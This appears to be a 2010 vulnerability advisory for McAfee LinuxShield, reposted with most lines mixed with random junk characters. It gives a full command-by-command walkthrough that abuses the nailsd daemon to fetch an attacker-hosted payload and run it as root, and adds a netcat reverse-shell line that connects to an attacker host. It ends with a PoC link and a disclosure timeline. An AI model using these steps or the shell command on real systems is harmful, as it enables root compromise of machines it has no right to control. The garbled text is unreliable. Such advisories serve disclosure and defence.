    LinuxShield is an important part of your network security. We
    9 s8 S6 U; K1 i" i' {: Irecommend that you set up an anti-virus security policy for your
    9 j) [% u5 g# I1 h0 ^# snetwork, incorporating as many protective measures as possible.
    ! {6 a. ^0 V8 _* z4 U. Z6 b7 {4 i9 ]$ d+ H/ a2 l  \; N# z
    LinuxShield uses a web-browser interface, and a large number of
    ) B- W2 s( `, s0 A' T. tLinuxShield installations can be centrally controlled by ePolicy- a5 y( o1 v+ [. Y; I4 V6 p' K
    Orchestrator.$ p4 s* X) z% h) S+ B7 a

    ' u2 N$ M, G; h! J+ X(Product description from LinuxShield Product Guide)
    1 E5 ~4 N, B, u/ a! l7 R
    0 x5 d: P0 \( `/ [* ^" Y
    ' K  \8 j. N: G3 d' u+ [/ Y+ z" @/ X; N0 X5 R) s$ u4 \
    Description:3 o( A4 w( o& h  u+ v
    ============, v1 [9 H0 f# F# I. c/ ~

      @3 u- R( F' l8 X8 @2 H9 |: a. QThis vulnerability allows remote attackers to execute arbitrary code
    ' p2 p6 B: Q3 [on vulnerable installations of McAfee LinuxShield. User interaction
    - g! R9 \- v$ R# h; o8 N  t! Ris not required to exploit this vulnerability but an attacker must, ~9 O/ Z: e0 |
    be authenticated.! Y3 A% Q8 M! q% m4 e& ^1 c

    7 B1 o# m* L' u: ^0 f/ F* }: c# F& mThe LinuxShield Webinterface communicates with the localy installed/ p& o, H3 D& k6 |$ N) Y: p6 R
    "nailsd" daemon, which listens on port 65443/tcp, to do& M3 O. ?% V6 E7 i' X& P
    configuration
    % d% i8 x& w- C; f1 Bchanges, query the configuration and execute tasks.
    $ k0 U1 t% _" ^8 Y1 H5 v4 R6 z) f! U3 G$ R
    Each user, which can login to the victim box, can also authenticate
    ' v, T& w! C8 Y5 M8 ait self to the "nailsd" and can do configuration changes and
    0 D. F" T; s4 O$ I4 a! qexecute- c- i! s( b6 D9 n) |  w5 D+ p
    tasks with root privileges.% Z7 g% Q, G: U; u5 Q

    ! j! H# {1 h+ i+ X3 S) h7 E2 {0 I' iA direct execution of commands is not possible, but it is possible to
    $ u* F! [7 t; R$ m, z2 w$ Sdownload and execute code through manipulation of the config and" V# L% D6 O- Z% q3 Z2 q( W
    execute schedule tasks of the LinuxShield.# }3 i1 Q1 ^9 C  }* X2 k
    % }& ]5 `# A  g' @
    . W' D( d9 r* s: i. u. }0 h0 n
    walk-through (after the TLS handshake):9 g1 ?* x) |6 L& Y1 c
    +--------------------------------------/ L! t: m5 p* t) \% U
    2 Z: G' e" X) m+ ^, J; ]
    nailsd > +OK welcome to the NAILS Statistics Service
    ! D1 \' `+ B) @attacker> auth <user> <pass>
    0 L' w+ o# I+ Z; N5 V5 hnailsd > +OK successful authentication
    7 k" W4 z: c. R' n2 ?
    2 W  Q7 W6 W! s; r) \  J# Set the Attacker repository to download our code from a httpd& j+ n+ ~2 P. h8 C, X
    # (catalog.z)  p7 b- C3 a% z3 R/ r8 ?- `
    #---------------------------------------------------------------- |+ v% {) {# \$ P0 Q6 H/ m6 i# k
    attacker> db set 1 _table=repository status=1 siteList=<?xml version" H/ C  h/ X2 L* _: d
    ="1.0" encoding="UTF-8"?><ns:SiteLists6 Y8 p8 A1 x* r3 h  v: S
    xmlns:ns="naSiteLi
    4 U1 g" s7 M) X  B; \6 wst" GlobalVersion="20030131003110"/ z1 B# S4 {; P( ?0 k; |/ i: p
    LocalVersion="20091209
    * q6 w" S9 A2 b161903" Type="Client"><SiteList8 C0 s/ [' T' H* V' Q0 s1 R9 L
    Default="1" Name="SomeGU1 t; p' N6 P, a4 L6 ?3 `: u
    ID"><HttpSite Type="repository"3 ]) @: l8 E) K3 C% V# N3 M
    Name="EvilRepo" Order="1
    ; J. J% q" O; u" Server="<attackerhost>:80"0 B6 x+ M. z6 J3 L7 a" `
    Enabled="1" Local="1"><Rela4 A4 S  X/ t/ ~* w
    6 s- z: m3 q: c; s1 d4 v2 d
    tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use
    ' _- i/ ~7 R0 ]1 i! }5 f# JrName></9 p# z( w' K1 q& P( k5 f/ D
    UserName><Password
    0 T0 G9 f% J! V4 t  v" e; hEncrypted="0"/></HttpSite></SiteList></! [% O: ]2 c! q4 A1 `- k% P$ H
    ns:SiteLists> _cmd=update/ R2 }6 b9 a4 d: y( s
    nailsd > +OK database changes buffered.8 m  k% r2 }6 N1 s
    ; F0 }6 N: {/ ~1 y/ v
    # Execute task to set the attacker repository
    . j. I1 D9 {: ?/ g#---------------------------------------------------------------
    7 m" w5 W+ Y, M5 Sattacker> task setsitelist
    9 n8 G% x3 B" t; a7 onailsd > +OK setting sitelist from CMA.
    * Y0 O0 J0 a0 g( E! H1 p, t
    5 S2 v; F  B: k: U# Execute the default Update task to download the code" ~; N0 r0 S. b( b
    #---------------------------------------------------------------" W5 x2 m6 r3 V$ f
    attacker> task nstart LinuxShield Update% b7 J! y' ~; I/ E- p
    nailsd > +OK task LinuxShield Update starting# J" e- o5 A( }4 o  L
      }: }% h- L! E; I3 w; S
    # Create a Scan profile, which executes our code. The profiles are9 Y, Q; |/ n  ^/ r9 ^" s  [! O' X, |3 D
    # not stored in the database.3 G( s6 m# v: V8 j7 V% H
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    # }% g- l4 K/ F+ a0 t#---------------------------------------------------------------) G% U; A3 D0 D3 u9 X6 J
    attacker> sconf ODS_99 begin
    ' J- w. J4 U. p- T! f  o8 {& rnailsd > +OK 1260400888
      N7 |, }  n) L  L  S) T& d% Q4 J7 Y% Z' T$ c
    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the
    8 Q9 Y2 w+ B" x0 Opath
    / A) G3 {4 `/ V( Y' F# where our earlier downloaded catalog.z file is stored.- K% B. \! k2 |7 c% @+ d. H6 J
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    3 e* L2 _3 T+ T4 x' r# U8 b#---------------------------------------------------------------" A# {5 o2 G- W5 }4 l$ F& A
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=1 {) @* e% r1 I) }
    true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
    2 `" X+ ?& G% F8 A$ F! b" q; Z7 RDS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
    ) I% L: Y7 b0 v( w7 D$ o5 e$ j10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng0 r1 `9 A+ [: C& n
    ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro9 T- x* e" v0 v
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
    5 m/ Z# h7 l1 Y( F8 V# i- Gir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en2 i5 d) t7 Z' N) o9 E( D
    ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
    ( Q( c/ }- p) B! r) e) c& L( L.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu$ O* M7 h9 {; E
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
      ], @7 R6 v9 |! O* a5 B5 E1 Ee nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99  D6 W  l; o9 @) C3 D  W
    .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
    + c( c% k" F; g! R/ yle.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil# Z" l2 I  i( D! x6 W" ?
    dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin( r6 Z) W: l& a
    e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr% P- {: @& F6 }8 |, |& j
    ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
    8 B" I! U1 N$ A7 O" n' M0 [7 C7 do=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
    # I2 D" b( W% n' G0 z) V.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t/ y! [4 L0 G) s5 s& U% k
    rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
      |$ h/ n, ]) |' H5 u) |7 c5 och/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100; m- p6 V( U. ]1 d7 G9 p; f: S9 E3 T
    00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
    ( a* }* j* L4 U) O" u2 wODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil4 ~" c9 J1 \0 {. B
    ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true4 ], c& T# i+ ^+ I7 W% c
    nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr1 V, z, ]- w* f9 b% z- T  Z( l
    ofile.ODS_99.filter.extensions.type=extension nailsd.profil- o9 W9 W- d0 D- O. L  h) Z
    e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_996 r6 u, n  c/ M% `1 {
    .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
    , ]1 ?' }" q1 E" |$ [9 d0 d+ Jaction.App.primary=Clean nailsd.profile.ODS_99.action.App.s
    8 d" U- M( }3 v' V' I' kecondary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa5 ?; }( l; y7 N; Z6 ~+ s) u
    ss nailsd.profile.ODS_99.action.error=Block
    # G0 i! s  U' z5 d* U" ?4 U( w5 Inailsd > +OK configuration changes buffered
    7 V. w* K4 q: h( l5 eattacker> sconf ODS_99 commit 1260400888
    ' o+ j5 _) X% ?1 O: n# ?nailsd > +OK configuration changes stored% P# y9 j  v4 d: u% |: d' Q
    : Q! s: i1 ]/ z: C( ]6 N: _
    # Set a scan task with the manipulated profile to execute the code
    ! Y; ?; W- x- X. a$ i#---------------------------------------------------------------
    ; d( {! a3 `7 Z) O8 n( \: L& Wattacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy2 K7 {% [2 I6 _* D5 N5 F+ `
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    * f- W+ W' o0 @- I$ |mp;exclude:false timetable=type=unscheduled taskResults=0 i
    4 \( z+ o; g7 K+ R_lastRun=1260318482 status=Stopped _cmd=insert' K# r& R* e1 S) U4 N9 A0 X
    nailsd > +OK database changes buffered
    1 z; x1 b% O8 m9 F% ?, q4 _7 U7 @" x& `' J
    # Execute scan task to execute the code; V" X) |8 P; l3 W; y9 j
    #---------------------------------------------------------------' d; C# `4 Y; w" M9 c6 J6 V3 q
    attacker> task nstart Evil Task, x+ B5 C% ?/ c, D9 {( V  A, l! \

    * Q" ^4 M2 `3 C! Z, u7 ?( V* ?+-------------------------------------- walk-through EOF
    8 ]! l  u2 c4 f- X8 b! Y7 E; L4 Y& T; G6 V# x5 g+ b1 |- t5 G

    7 N; G( K6 P; t: TTo get a reverse root shell place something like this in the catalog.z+ n( K9 O( F3 X- X! j/ P
    3 ]- @/ \0 H4 P$ O! u6 r
    --- snip ---
    - k% {, H) p# ]8 ]+ n7 p8 b9 z8 E#!/bin/sh% c1 N' q$ l+ d; n$ T" ?
    nc -nv <attacker_host> 4444 -e /bin/sh2 n+ n  s& O* ]( h2 P
    --- /snip ---9 H& k, w- M7 Q# X5 B6 }! b

    ; |6 S0 E- x! A) _& g$ B, v
    + L. P& x6 H9 I8 q# I7 `: R  |/ M7 T) Q, s$ x" Y1 B
    Proof of Concept :+ P5 |+ u6 B' F; R
    ==================
    , l2 Y5 A( {% b( {) y5 Y/ U. z& \- A1 ?
    http://inj3ct0r.com/sploits/11165.tar.gz; E  c8 X9 L) B7 h6 d. u

    8 L  r7 o) o1 ~0 `4 K: j/ h) U- Y5 t. |1 ]4 H: q/ ]1 u" e

    % Q5 h/ V8 F( WSolution:
    , v& d* `2 F8 W# P1 N& R=========
    ! u0 L; j6 D: t) p  S, c) Q
    4 X0 f/ F3 G! u2 M! N5 I3 PMcAfee Advisory  S4 f" N/ k7 K8 N# R' _2 b. \
    +--------------
    : A( m0 v+ q& Q( @3 @https://kc.mcafee.com/corporate/index?page=content&amp;id=SB100072 N' _6 A( g+ l0 M% ]
    2 e/ }: |4 i) b* Q1 Y
    8 o$ Z- H+ W" r
    # K" m4 a) B$ o  S9 w5 U! R* m
    Disclosure Timeline (YYYY/MM/DD):
    / k; n0 _) _2 e4 ?* O+ F$ o  K=================================
    / X; Y9 `4 G) u% X$ G8 {; }8 d% i5 _* [. K, P9 E7 W
    2009.12.07: Vulnerability found
    9 p& F3 l$ Z4 \0 h( z, \2010.02.03: Asked vendor for a PGP key' v3 ~% r$ l# b7 b+ L2 c
    2010.02.05: Vendor sent his PGP key+ Q. E( D) @8 }8 ]
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure. n! }" \% N+ n, y( e
    date (2010.02.18) to Vendor$ s6 |0 k5 {' Z* I$ w! X% i0 m6 X6 ?
    2010.02.05: Vendor acknowledges the reception of the advisory+ y7 T/ X* ~. t5 ?4 X
    2010.02.16: Ask for a status update, because the planned release date is
    ' D4 \! a' a+ T! f9 K. q2 U/ i2010.02.18.
    : d, g0 y3 B: c1 C! Z2010.02.16: Vendor response that, they are currently working on a patch2 K4 j0 }- F9 e. G* U7 }
    2010.02.17: Changed release date to 2010.02.25.
    2 b' ?1 D0 z& r9 r& z2010.02.22: Vendor gives a status update, that they are able to release
    # ~/ p% @+ g+ ?* d/ wthe patch on 2010.02.25.5 L& B2 [, t8 I3 s- a( Q- ]
    2010.02.24: Ask for a list of affected products and the advisory url.; k( J% l; w; _: w4 q
    2010.02.24: Vendor sends the list.1 ?3 ?0 u# M. S, G  e) R
    2010.03.02: Release of this Advisory4 @! i; U0 e; W3 f+ \6 P

    ) y/ x/ c& c2 L* t+ ?
    0 D# H4 d; I1 o7 p( Z" N: N7 {% U; H9 O! g! N/ t; D7 ^' U
    4 C- }- l$ }4 ~3 _2 i
    , L6 t9 V2 t3 V

    3 F3 `+ j2 X# S
    5 a" a% Q! ?5 D4 C# w: u; d$ Y2 U6 R, [/ F3 f1 W( ^' @2 s
    . e2 L+ x7 i9 L
    $ W  \. v" @0 R9 m

    , y1 {" ]) `  U$ B
    / d2 K5 u8 p# H1 j5 W! ]/ V% ?8 S
    : j% b; s* n5 {, X7 z& R/ ?9 j/ f: S) x0 Z5 I5 V- v- ~
    . `# @9 N* x8 A( d, N7 P+ D

    ) c: K+ Y3 J3 A
    8 N6 e. X1 O# X# d% u/ {1 [' G% g) Q+ J
    % Z6 o# ]$ e; A! N, N7 ^
    ' \6 d) V. D5 X

    # Q) v! d5 L) r1 u公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表